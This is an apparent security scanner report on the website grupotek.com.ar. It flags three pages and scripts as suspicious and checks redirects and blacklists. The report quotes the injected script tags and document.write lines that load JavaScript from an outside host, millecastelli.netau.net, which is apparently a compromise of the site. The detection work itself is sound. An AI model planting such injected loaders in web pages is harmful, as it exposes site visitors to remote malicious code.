Scanned pages/files
Request | Server response | Status |
http://www.grupotek.com.ar/ | 200 OK Content-Length: 13906 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://millecastelli.netau.net/eEggJ0dj.php?id=86919437"></script> | ||
http://www.grupotek.com.ar/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8177 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://millecastelli.netau.net/eEggJ0dj.php?id=86919446"></script>');
| ||
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
http://malsup.github.com/chili-1.7.pack.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=600 Connection: close Date: Fri, 18 Jul 2014 03:24:15 GMT Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://malsup.github.io/chili-1.7.pack.js Server: GitHub.com Vary: Accept-Encoding Content-Length: 178 Content-Type: text/html Expires: Fri, 18 Jul 2014 03:34:15 GMT X-Cache: MISS X-Cache-Hits: 0 X-Served-By: cache-fra1229-FRA X-Timer: S1405653855.652108192,VS0,VE110 | clean |
http://malsup.github.io/chili-1.7.pack.js | 200 OK Content-Length: 7008 Content-Type: application/javascript | clean |
http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 18 Jul 2014 03:24:16 GMT Via: 1.1 814d8a50ff0449894df61e2ee81d34b0.cloudfront.net (CloudFront) Location: https://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js Server: CloudFront Content-Length: 183 Content-Type: text/html X-Amz-Cf-Id: ueYBMkWZ37AOlheHFPddQDkD5nu7hZK5pO4yEIXwrlHNsaJ_aM0o1g== X-Cache: Redirect from cloudfront | clean |
https://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.2.72.js | 403 Forbidden Content-Length: 231 Content-Type: application/xml | clean |
http://cloud.github.com/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 18 Jul 2014 03:24:17 GMT Via: 1.1 6cde3c778df412041adc7610331b57bc.cloudfront.net (CloudFront) Location: https://cloud.github.com/test404page.js Server: CloudFront Content-Length: 183 Content-Type: text/html X-Amz-Cf-Id: 8aJTEPyVpWxebRMLDXJ9V-lhNymBQGhyxc5qbklFVK-NApO26Z6oFw== X-Cache: Redirect from cloudfront | clean |
https://cloud.github.com/test404page.js | 403 Forbidden Content-Length: 231 Content-Type: application/xml | clean |
http://malsup.github.com/jquery.easing.1.1.1.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=600 Connection: close Date: Fri, 18 Jul 2014 03:24:18 GMT Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://malsup.github.io/jquery.easing.1.1.1.js Server: GitHub.com Vary: Accept-Encoding Content-Length: 178 Content-Type: text/html Expires: Fri, 18 Jul 2014 03:34:18 GMT X-Cache: MISS X-Cache-Hits: 0 X-Served-By: cache-fra1227-FRA X-Timer: S1405653858.453363657,VS0,VE95 | clean |
http://malsup.github.io/jquery.easing.1.1.1.js | 200 OK Content-Length: 3401 Content-Type: application/javascript | clean |
http://www.grupotek.com.ar/apagar.js | 200 OK Content-Length: 634 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://millecastelli.netau.net/eEggJ0dj.php?id=86919427"></script>');
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: grupotek.com.ar
Result:
GET / HTTP/1.1
Host: grupotek.com.ar
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: grupotek.com.ar
Referer: http://www.google.com/search?q=grupotek.com.ar
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: grupotek.com.ar
Referer: http://www.google.com/search?q=grupotek.com.ar
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=grupotek.com.ar
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://grupotek.com.ar/
Result: grupotek.com.ar is not infected or malware details are not published yet.
Result: grupotek.com.ar is not infected or malware details are not published yet.